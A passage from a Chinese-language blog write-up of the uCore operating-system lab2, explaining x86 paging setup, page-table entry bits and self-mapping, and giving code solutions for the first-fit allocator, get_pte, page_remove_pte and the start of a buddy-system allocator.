- __boot_pgdir) # pad to PGSIZE</span><br><span class="line"><span class="meta"></span></span><br><span class="line"><span class="meta">.set</span> i, <span class="number">0</span></span><br><span class="line"><span class="symbol">__boot_pt1:</span></span><br><span class="line"><span class="meta">.rept</span> <span class="number">1024</span></span><br><span class="line"><span class="meta">    .long</span> i * PGSIZE + (PTE_P | PTE_W)</span><br><span class="line"><span class="meta">    .set</span> i, i + <span class="number">1</span></span><br><span class="line"><span class="meta">.endr</span></span><br></pre></td></tr></table></figure><ul><li><p>首先，将一级页表 <strong>__boot_pgdir</strong>  （页目录表PDT）的<strong>物理</strong>基地址加载进<code>%cr3</code>寄存器中。</p><ul><li><p>该一级页表<strong>暂时</strong>将虚拟地址 <strong>0xC0000000 + (0~4M)</strong> 以及虚拟地址 <strong>(0~4M)</strong>   设置为物理地址 <strong>(0-4M)</strong> 。</p><p>之后会重新设置一级页表的映射关系。</p><blockquote><p>为什么要将两段虚拟内存映射到同一段物理地址呢？思考一下，答案就在下方。</p></blockquote></li></ul></li><li><p>之后，设置<code>%cr0</code>寄存器中<strong>PE、PG、AM、WP、NE、MP</strong>位，关闭<strong>TS</strong> 与<strong>EM</strong> 位，以启动分页机制。</p><blockquote><p>先介绍一下<code>%cr0</code>寄存器主要3个标志位的功能：</p><ul><li><strong>P</strong>rotection <strong>E</strong>nable: 启动保护模式，默认只是打开分段。</li><li><strong>P</strong>a<strong>g</strong>ing: 设置分页标志。只有PE和PG位同时置位，才能启动分页机制。</li><li><strong>W</strong>rite <strong>P</strong>rotection: 当该位为1时，CPU会禁止ring0代码向read only page写入数据。这个标志位主要与<strong>写时复制</strong>有关系。</li></ul><p>除<strong>PE</strong>、<strong>PG</strong>与<strong>WP</strong> 的<strong>其他</strong>标志位与分页机制关联不大，其设置或清除的原因盲猜可能是通过启动分页机制这个机会来<strong>顺便做个初始化</strong>。</p></blockquote><blockquote><p>当改变PE和PG位时，必须小心。只有<strong>当执行程序至少有部分代码和数据在线性地址空间和物理地址空间中具有相同地址时，我们才能改变PG位的设置</strong>。</p><p>因为当<code>%cr0</code>寄存器一旦设置，则<strong>分页机制立即开启</strong>。此时这部分具有相同地址的代码在分页和未分页之间起着桥梁的作用。无论是否开启分页机制，这部分代码都必须具有相同的地址。</p><p>而这一步的操作能否成功，关键就在于一级页表的设置。一级页表将虚拟内存中的两部分地址<strong>KERNBASE+(0-4M)</strong> 与 <strong>(0-4M)</strong> 暂时都映射至物理地址 
<strong>(0-4M)</strong> 处，这样就可以满足上述的要求。</p></blockquote></li><li><p>最后，<strong>必须</strong>来个简单的<code>jmp</code>指令，将<code>eip</code>从物理地址“修改”为虚拟地址。</p><blockquote><p>在修改了PE位之后，程序必须立刻使用一条跳转指令，以刷新处理器流水线中已经预取的、属于另一模式的指令。</p></blockquote></li></ul><h4 id="b-uCore段页机制启动过程">b. uCore段页机制启动过程</h4><ul><li>bootloader在启动保护模式前，会设置一个临时GDT，供进入保护模式后的bootloader和uCore使用。</li><li>uCore被bootloader加载进内存后，在<code>kern_entry</code>中启动页机制。</li><li>在<code>pmm_init</code>中建立双向链表来管理物理内存，并设置一级页表（页目录表）与二级页表。</li><li>最后重新加载新的GDT。</li></ul><blockquote><p>lab2相对于lab1，新增了页机制相关的处理过程，其他过程没有改变。</p></blockquote><h4 id="c-uCore物理页结构">c. uCore物理页结构</h4><ul><li><p>uCore中用于管理物理页的结构如下所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* *</span></span><br><span class="line"><span class="comment">* struct Page - Page descriptor structures. Each Page describes one</span></span><br><span class="line"><span class="comment">* physical page. 
In kern/mm/pmm.h, you can find lots of useful functions</span></span><br><span class="line"><span class="comment">* that convert Page to other data types, such as physical address.</span></span><br><span class="line"><span class="comment">* */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">Page</span> &#123;</span><br><span class="line">  <span class="type">int</span> ref;                <span class="comment">// 当前页被引用的次数，与内存共享有关</span></span><br><span class="line">  <span class="type">uint32_t</span> flags;         <span class="comment">// 标志位的集合，与eflags寄存器类似</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> property;  <span class="comment">// 空闲的连续page数量。这个成员只会用在连续空闲page中的第一个page</span></span><br><span class="line">  <span class="type">list_entry_t</span> page_link; <span class="comment">// 链表节点，含两个指针，分别指向上一个和下一个连续空闲块的页头</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p>目前在lab2中，flags可以设置的位只有<code>reserved</code>位和<code>Property</code>位。</p><blockquote><p><code>reserved</code>位表示当前页是否被保留，一旦保留该页，则该页无法用于分配；</p><p><code>Property</code>位表示当前页是否为一段连续空闲页的页头：为1表示该页是空闲块的页头，可用于分配；为0表示该页已被分配，或者不是空闲块的页头。</p></blockquote></li><li><p>所有的数据结构Page都存放在<strong>一维Page结构数组</strong>中。但请注意，这并非虚拟页表（VPT），即该<strong>一维Page结构数组并非分页机制用于<em>将虚拟地址转换为物理地址</em>这个过程所用到的一级与二级页表</strong>，它只是用于记录对应物理页的相关属性，例如当前物理页被二级页表引用的次数等等。</p></li><li><p>同时，该一维Page结构数组的存储位置与虚拟页表VPT的存储位置不同。前者的起始存储地址为kernel结尾地址向上4k对齐后的第一个物理页面，而后者则存储于指定虚拟地址<code>0xFAC00000</code>。</p></li><li><p>页目录表使用<strong>线性地址</strong>的首部(PDX, 10bit)作为索引，二级页表使用<strong>线性地址</strong>的中部(PTX, 10bit)作为索引，而Page结构数组使用<strong>物理地址</strong>的首部与中部(PPN, 20bit)作为索引（注意是<strong>物理</strong>地址）。</p></li><li><p>为了加快查找，所有连续空闲页块的第一个Page结构会相互链接，构成一个双向链表，其头结点是<code>free_area.free_list</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span 
class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* free_area_t - maintains a doubly linked list to record free (unused) pages */</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span> &#123;</span><br><span class="line">  <span class="type">list_entry_t</span> free_list;         <span class="comment">// the list header</span></span><br><span class="line">  <span class="type">unsigned</span> <span class="type">int</span> nr_free;           <span class="comment">// # of free pages in this free list</span></span><br><span class="line">&#125; <span class="type">free_area_t</span>;</span><br><span class="line"><span class="type">free_area_t</span> free_area;</span><br></pre></td></tr></table></figure></li></ul><h4 id="d-虚拟页表结构">d. 虚拟页表结构</h4><p>每个页表项（PTE）都由一个32位整数来存储数据，其结构如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">      <span class="number">31</span><span class="number">-12</span>      <span class="number">9</span><span class="number">-11</span>     <span class="number">8</span>    <span class="number">7</span>    <span class="number">6</span>   <span class="number">5</span>   <span class="number">4</span>      <span class="number">3</span>    <span class="number">2</span>   <span class="number">1</span>   <span class="number">0</span></span><br><span class="line">+--------------+-------+-----+----+---+---+-----+-----+---+---+---+</span><br><span class="line">|     Offset   | Avail | MBZ | PS | D | A | PCD | PWT | U | W | P |</span><br><span class="line">+--------------+-------+-----+----+---+---+-----+-----+---+---+---+</span><br></pre></td></tr></table></figure><ul><li><p>0 - <strong>P</strong>resent: 
表示当前PTE所指向的物理页面是否驻留在内存中</p></li><li><p>1 - <strong>W</strong>riteable: 表示是否允许写入（为0时该页只读）</p></li><li><p>2 - <strong>U</strong>ser: 表示该页的访问所需要的特权级。即User(ring 3)是否允许访问</p></li><li><p>3 - <strong>P</strong>age<strong>W</strong>rite<strong>T</strong>hrough:  表示是否使用write through缓存写策略</p></li><li><p>4 - <strong>P</strong>age<strong>C</strong>ache<strong>D</strong>isable: 表示是否<strong>不对</strong>该页进行缓存</p></li><li><p>5 - <strong>A</strong>ccessed: 表示该页是否已被访问过</p></li><li><p>6 - <strong>D</strong>irty: 表示该页是否已被修改</p></li><li><p>7 - <strong>P</strong>age<strong>S</strong>ize: 表示该页的大小（在页目录项中置1表示4MB大页）</p></li><li><p>8 - <strong>M</strong>ust<strong>B</strong>e<strong>Z</strong>ero: 该位必须保留为0</p></li><li><p>9-11 - <strong>Avail</strong>able: 第9-11这三位不会被CPU使用，可留给OS自行使用。</p></li><li><p>12-31 - Offset: 目标物理页地址的高20位。</p><blockquote><p>因为目标地址以4k作为对齐标准，所以该地址的低12位永远为0，故这12位空间可用于设置标志位。</p></blockquote></li></ul><h4 id="e-自映射">e. 自映射</h4><ul><li><p>自映射的好处</p><ul><li>当页目录与页表建立完成后，如果需要按虚拟地址的地址<strong>顺序显示整个页目录表和页表的内容</strong>，则要查找页目录表的页目录表项内容，并根据页目录表项内容找到页表的物理地址，再转换成对应的虚地址，然后访问页表的虚地址，遍历整个页表的每个页表项。这样的过程比较繁琐，而自映射可以改善这个过程。</li><li>节省4KB空间</li><li>方便用户态程序访问页表，可以用这种方式实现一个用户地址空间的映射</li></ul></li><li><p>页表自映射的关键点</p><ul><li><p>把所有的页表（4KB * 1024个）放到<strong>连续</strong>的4MB <strong>虚拟地址</strong> 空间中，并且要求这段空间4MB对齐，这样，<strong>就会有一张虚拟页的内容与页目录的内容完全相同</strong>。</p></li><li><p>页目录结构必须和页表结构相同。</p></li><li><p>此时在页目录表中，会存在一个页目录条目，该页目录条目指向某个二级页表。而该二级页表的物理地址，正是页目录表所处于物理页的<strong>物理</strong>地址。</p><p>即，页目录表中存在一个页目录条目，该条目内含的物理地址就是页目录表本身的物理地址。</p><p>uCore中的这条代码证实了这个结论:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// recursively insert boot_pgdir in itself</span></span><br><span class="line"><span class="comment">// to form a virtual page table at virtual address VPT</span></span><br><span 
class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// PDX(VPT)为4MB虚拟页表所对应的PageDirectoryIndex</span></span><br><span class="line">boot_pgdir[<span class="built_in">PDX</span>(VPT)] = <span class="built_in">PADDR</span>(boot_pgdir) | PTE_P | PTE_W;</span><br></pre></td></tr></table></figure><p>而下面这张图演示了其指向过程:</p><blockquote><p>注意页目录表此时存储于VPT的4MB范围中。</p></blockquote><pre class="mermaid">    graph LR;PDT-->PT1PDT-->PT2/PDTPT1-->PhyPage1PT1-->PhyPage2PT2/PDT-->PhyPage3/PT1PT2/PDT-->PhyPage4/PT2</pre></li></ul></li><li><p>参考：<a href="https://blog.csdn.net/u010513059/article/details/80311248">页表自映射</a></p></li></ul><h3 id="5-uCore栈的迁移">5) uCore栈的迁移</h3><ul><li><p>在原先的lab1中，bootloader所设置的栈起始地址为<code>0x7c00</code>，之后的uCore的代码也沿用了这个栈，但仍然划分出了一个全局数组作为TSS上的ring0栈地址（该全局数组位于uCore的bss段）。</p><blockquote><p>注意此时的<strong>两个</strong>内核栈是不一样的，一个是中断外使用的栈，另一个是中断内使用的栈。</p></blockquote></li><li><p>而在lab2中，栈稍微做了一些改变。bootloader所设置的栈起始地址仍然为<code>0x7c00</code>，但在将uCore加载进内存之后，在<code>kern_entry</code>中，该部分代码在启动页机制后将栈设置为uCore data段上的一个全局数组的末尾地址<code>bootstacktop</code>（8KB），并也在<code>gdt_init</code>将TSS ring0栈地址设置为了<code>bootstacktop</code>。</p><blockquote><p>与Lab1不同，之后内核可以使用的内核栈只有一个。</p></blockquote><blockquote><p>中断处理程序可能会从高地址开始，向下覆盖ring3的栈数据。这个漏洞可能是因为未完全实现的内存管理机制所导致的。</p></blockquote></li></ul><h2 id="2-练习解答">2. 
练习解答</h2><h3 id="1-练习0">1) 练习0</h3><blockquote><p><strong>填写已有实验</strong>，将完成的实验1中的代码添加进实验2中。</p></blockquote><p>这个没什么好说的，一个个照搬就成。</p><h3 id="2-练习1">2) 练习1</h3><blockquote><p><strong>实现 first-fit 连续物理内存分配算法</strong>。</p></blockquote><p>原先的uCore实验2代码中几乎已经完全实现了first-fit算法，但其中仍然存在一个问题，以至于无法通过check。什么问题呢：</p><blockquote><p><code>first-fit</code>算法要求将空闲内存块<strong>按照地址从小到大的方式</strong>连起来。</p></blockquote><p>但uCore中的代码没有实现这一点。所以要手动修改相关的代码。</p><ul><li><p><code>default_init_memmap</code></p><ul><li><p>该函数将新页面插入链表时，没有按照地址顺序插入</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">list_add</span>(&amp;free_list, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li><li><p>故需要修改该行代码，使其按地址顺序插入至双向链表中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">list_add_before</span>(&amp;free_list, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li></ul></li><li><p><code>default_alloc_pages</code></p><ul><li><p>在原先的代码中，当获取到了一个大小足够大的页面地址时，程序会先将该页头从链表中断开，切割，并将剩余空间放回链表中。但将<em>剩余空间放回链表</em>时，并没有按照地址顺序插入链表。</p><blockquote><p>连续空闲页面中的第一个页称为页头，page header。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (page != <span class="literal">NULL</span>) &#123;</span><br><span class="line">    <span 
class="built_in">list_del</span>(&amp;(page-&gt;page_link));</span><br><span class="line">    <span class="keyword">if</span> (page-&gt;property &gt; n) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *p = page + n;</span><br><span class="line">        p-&gt;property = page-&gt;property - n;</span><br><span class="line">        <span class="comment">// 注意这一步</span></span><br><span class="line">        <span class="built_in">list_add</span>(&amp;free_list, &amp;(p-&gt;page_link));</span><br><span class="line">    &#125;</span><br><span class="line">    nr_free -= n;</span><br><span class="line">    <span class="built_in">ClearPageProperty</span>(page);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>以下是修改后的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (page != <span class="literal">NULL</span>) &#123;</span><br><span class="line">    <span class="keyword">if</span> (page-&gt;property &gt; n) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *p = page + n;</span><br><span class="line">        p-&gt;property = page-&gt;property - n;</span><br><span class="line">        <span class="built_in">SetPageProperty</span>(p);</span><br><span class="line">        <span class="comment">// 注意这一步add after</span></span><br><span class="line">        <span class="built_in">list_add_after</span>(&amp;(page-&gt;page_link), 
&amp;(p-&gt;page_link));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="built_in">list_del</span>(&amp;(page-&gt;page_link));</span><br><span class="line">    nr_free -= n;</span><br><span class="line">    <span class="built_in">ClearPageProperty</span>(page);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul></li><li><p><code>default_free_pages</code></p><ul><li><p>该函数默认会在函数末尾处，将待释放的页头插入至链表的第一个节点。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">list_add</span>(&amp;free_list, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li><li><p>所以我们需要修改这部分代码，使其按地址顺序插入至对应的链表结点处。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 将空闲页面按地址大小插入至链表中</span></span><br><span class="line"><span class="keyword">for</span>(le = <span class="built_in">list_next</span>(&amp;free_list); le != &amp;free_list; le = <span class="built_in">list_next</span>(le))</span><br><span class="line">&#123;</span><br><span class="line">    p = <span class="built_in">le2page</span>(le, page_link);</span><br><span class="line">    <span class="keyword">if</span> (base + base-&gt;property &lt;= p) &#123;</span><br><span class="line">        <span class="built_in">assert</span>(base + base-&gt;property != p);</span><br><span class="line">        <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span 
class="line"><span class="built_in">list_add_before</span>(le, &amp;(base-&gt;page_link));</span><br></pre></td></tr></table></figure></li></ul></li></ul><h3 id="3-练习2">3) 练习2</h3><blockquote><p><strong>实现寻找虚拟地址对应的页表项</strong>.</p></blockquote><blockquote><p>通过设置页表和对应的页表项，可建立虚拟内存地址和物理内存地址的对应关系。</p><p>其中的<code>get_pte</code>函数是设置页表项环节中的一个重要步骤。此函数找到一个虚地址对应的二级页表项的内核虚地址，如果此二级页表项不存在，则分配一个包含此项的二级页表。</p></blockquote><p>以下为实现的代码</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">pte_t</span> * <span class="title">get_pte</span><span class="params">(<span class="type">pde_t</span> *pgdir, <span class="type">uintptr_t</span> la, <span class="type">bool</span> create)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 获取传入的线性地址中所对应的页目录条目的物理地址</span></span><br><span class="line">    <span class="type">pde_t</span> *pdep = &amp;pgdir[<span class="built_in">PDX</span>(la)];</span><br><span class="line">    <span class="comment">// 如果该条目不可用(not present)</span></span><br><span class="line">    <span class="keyword">if</span> (!(*pdep &amp; PTE_P)) &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title 
class_">Page</span> *page;</span><br><span class="line">        <span class="comment">// 如果分配页面失败，或者不允许分配，则返回NULL</span></span><br><span class="line">        <span class="keyword">if</span> (!create || (page = <span class="built_in">alloc_page</span>()) == <span class="literal">NULL</span>)</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">NULL</span>;</span><br><span class="line">        <span class="comment">// 设置该物理页面的引用次数为1</span></span><br><span class="line">        <span class="built_in">set_page_ref</span>(page, <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// 获取该Page结构所对应物理页的物理地址</span></span><br><span class="line">        <span class="type">uintptr_t</span> pa = <span class="built_in">page2pa</span>(page);</span><br><span class="line">        <span class="comment">// 清空该物理页面的数据。需要注意的是使用虚拟地址</span></span><br><span class="line">        <span class="built_in">memset</span>(<span class="built_in">KADDR</span>(pa), <span class="number">0</span>, PGSIZE);</span><br><span class="line">        <span class="comment">// 将新分配页面的物理地址及权限位写入当前缺失的页目录条目</span></span><br><span class="line">        <span class="comment">// 之后该页面就作为一张二级页表使用</span></span><br><span class="line">        *pdep = pa | PTE_U | PTE_W | PTE_P;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 返回在pgdir中对应于la的二级页表项</span></span><br><span class="line">    <span class="keyword">return</span> &amp;((<span class="type">pte_t</span> *)<span class="built_in">KADDR</span>(<span class="built_in">PDE_ADDR</span>(*pdep)))[<span class="built_in">PTX</span>(la)];</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>请描述页目录项（Page Directory Entry）和页表项（Page Table Entry）中每个组成部分的含义以及对ucore而言的潜在用处。</p><blockquote><p>请查看<a 
href="#d-%E8%99%9A%E6%8B%9F%E9%A1%B5%E8%A1%A8%E7%BB%93%E6%9E%84">虚拟页表结构</a></p></blockquote></li><li><p>如果ucore执行过程中访问内存，出现了页访问异常，请问硬件要做哪些事情？</p><blockquote><p>以下答案参考了其他blog，具体细节留待以后再来研究。</p></blockquote><ul><li>引发页访问异常的线性地址会被保存在cr2寄存器中</li><li>将错误代码（error code）压入内核栈</li><li>引发Page Fault（14号异常），并通过IDT跳转到对应的异常处理例程；将外存的数据换到内存中等后续工作由操作系统完成</li><li>处理完成后退出中断，返回到中断前的状态，重新执行引发异常的指令</li></ul></li></ul><h3 id="4-练习3">4) 练习3</h3><blockquote><p><strong>释放某虚地址所在的页并取消对应二级页表项的映射</strong>.</p></blockquote><blockquote><p>当释放一个包含某虚地址的物理内存页时，需要让对应此物理内存页的管理数据结构Page做相关的清除处理，使得此物理内存页成为空闲；另外还需把表示虚地址与物理地址对应关系的二级页表项清除。</p></blockquote><p>这个练习不是很难，对着注释完成即可。以下为实现的代码：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//page_remove_pte - free a Page struct which is related to linear address la</span></span><br><span class="line"><span class="comment">//                - and clean(invalidate) pte which is related to linear address la</span></span><br><span class="line"><span class="comment">//note: PT is changed, so the TLB needs to be invalidated</span></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="keyword">inline</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">page_remove_pte</span><span class="params">(<span class="type">pde_t</span> *pgdir, <span 
class="type">uintptr_t</span> la, <span class="type">pte_t</span> *ptep)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// 如果传入的页表条目是可用的</span></span><br><span class="line">    <span class="keyword">if</span> (*ptep &amp; PTE_P) &#123;</span><br><span class="line">        <span class="comment">// 获取该页表条目所指向物理页对应的Page结构</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">Page</span> *page = <span class="built_in">pte2page</span>(*ptep);</span><br><span class="line">        <span class="comment">// 如果该页的引用次数在减1后为0</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">page_ref_dec</span>(page) == <span class="number">0</span>)</span><br><span class="line">            <span class="comment">// 释放当前页</span></span><br><span class="line">            <span class="built_in">free_page</span>(page);</span><br><span class="line">        <span class="comment">// 清空PTE</span></span><br><span class="line">        *ptep = <span class="number">0</span>;</span><br><span class="line">        <span class="comment">// 使TLB中对应la的条目失效</span></span><br><span class="line">        <span class="built_in">tlb_invalidate</span>(pgdir, la);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><ul><li><p>数据结构Page的全局变量（其实是一个数组）的每一项与页表中的页目录项和页表项有无对应关系？如果有，其对应关系是啥？</p><ul><li><p>当页目录项或页表项有效时，Page数组中的项与页目录项或页表项存在对应关系。</p></li><li><p>页目录表中存放着若干页目录项PDE，这些页目录项中存放了某个二级页表所在物理页的信息，包括该二级页表的<strong>物理地址</strong>，但使用<strong>线性地址</strong>的头部PDX(Page Directory Index)来索引页目录表。</p><blockquote><p>总结一下，页目录表内存放二级页表的<strong>物理地址</strong>，但却使用<strong>线性地址</strong>索引页目录表中的条目。</p></blockquote></li><li><p>而页表（二级页表）与页目录（一级页表）具有类似的特性，页表中的页表项指向所管理的物理页的<strong>物理地址</strong>（不是数据结构Page的地址），使用线性地址的中部PTX(Page Table 
Index)来索引页表。</p></li><li><p>当二级页表获取物理页时，需要对该物理页所对应的数据结构page来做一些操作。其操作包括但不限于设置引用次数，这样方便共享内存。</p></li></ul><blockquote><p>为什么页目录表中存放的是<strong>物理</strong>地址呢？可能是为了防止递归查找。</p><p>即原先查找页目录表的目的是想将某个线性地址转换为物理地址，但如果页目录表中存放的是二级页表的<strong>线性</strong>地址，则需要先查找该二级页表的物理地址，此时需要递归查找，这可能会出现永远也查找不到物理地址的情况。</p></blockquote></li><li><p>如果希望虚拟地址与物理地址相等，则需要如何修改lab2，完成此事？ <strong>鼓励通过编程来具体完成这个问题</strong></p><ul><li><p>将<code>labcodes/lab2/tools/kernel.ld</code>中的加载地址从<code>0xC0100000</code>修改为<code>0x0</code></p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 修改前</span></span><br><span class="line">. = <span class="number">0xC0100000</span>;</span><br><span class="line"><span class="comment">// 修改后</span></span><br><span class="line">. = <span class="number">0x0</span>;</span><br></pre></td></tr></table></figure></li><li><p>将<code>mm/</code>中的内核偏移地址修改为0</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 修改前</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> KERNBASE            0xC0000000</span></span><br><span class="line"><span class="comment">// 修改后</span></span><br><span class="line"><span class="meta">#<span class="keyword">define</span> KERNBASE            0x0</span></span><br></pre></td></tr></table></figure></li><li><p>最后一步，但也是必须要做的一步——<strong>关闭页机制</strong>。将开启页机制的那一段代码删除或注释掉最后一句即可。</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 修改后</span><br><span class="line">movl %cr0, %eax</span><br><span class="line">orl $(CR0_PE | CR0_PG | CR0_AM | CR0_WP | CR0_NE | CR0_TS | CR0_EM | CR0_MP), %eax</span><br><span class="line">andl $~(CR0_TS | CR0_EM), %eax</span><br><span class="line"># 注释了最后一句</span><br><span class="line"># movl %eax, %cr0</span><br></pre></td></tr></table></figure><blockquote><p>为什么要关闭页机制？只将偏移地址设置为0不够么？这是个值得探讨的问题。</p><p>注意到<code>kern/init/entry.S</code>中有这样一段代码</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">next:</span></span><br><span class="line">  # unmap va <span class="number">0</span> ~ 4M, it&#x27;s temporary mapping</span><br><span class="line">  xorl %eax, %eax</span><br><span class="line">  movl %eax, __boot_pgdir</span><br></pre></td></tr></table></figure><p>当CPU完成了<code>eip</code>的地址更新后，这两条指令会删除页目录表中的一个<strong>临时</strong>映射（va 0 ~ 4M to pa 0 ~ 4M）。</p><p>但当KERNBASE为0时，一旦删除了这个临时映射，CPU就无法正常寻址，即便页目录表中还有一个映射（va KERNBASE + (0 ~ 4M) to pa 0 ~ 4M，注意此时KERNBASE为0）。</p><p>而只要基地址不为0，就不会出错。</p><p>具体的问题在哪呢？或许，需要查询一下intel 80386的相关手册。</p></blockquote></li></ul></li></ul><h3 id="5-扩展练习">5) 扩展练习</h3><h4 id="Challenge1">Challenge1</h4><blockquote><p><strong>buddy system（伙伴系统）分配算法</strong></p><p>Buddy System算法把系统中的可用存储空间划分为存储块(Block)来进行管理, 每个存储块的大小必须是2的n次幂(Pow(2, n)), 即1, 2, 4, 8, 16, 32, 64, 128…</p></blockquote><h5 id="a-前置准备">a. 
前置准备</h5><p>伙伴系统中每个存储块的大小都必须是2的n次幂，所以其中必须有个<strong>可以将传入数转换为不大于该数的最大的2的n次幂</strong>的函数，相关代码如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 传入一个数，返回不大于该数的最大的2的幂（包括该数本身就是2的幂的情况）</span></span><br><span class="line"><span class="function"><span class="type">size_t</span> <span class="title">getLessNearOfPower2</span><span class="params">(<span class="type">size_t</span> x)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="type">size_t</span> _i;</span><br><span class="line">    <span class="keyword">for</span>(_i = <span class="number">0</span>; _i &lt; <span class="built_in">sizeof</span>(<span class="type">size_t</span>) * <span class="number">8</span> - <span class="number">1</span>; _i++)</span><br><span class="line">        <span class="keyword">if</span>(((<span class="type">size_t</span>)<span class="number">1</span> &lt;&lt; (_i + <span class="number">1</span>)) &gt; x)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">    <span class="keyword">return</span> (<span class="type">size_t</span>)<span class="number">1</span> &lt;&lt; _i;</span><br><span 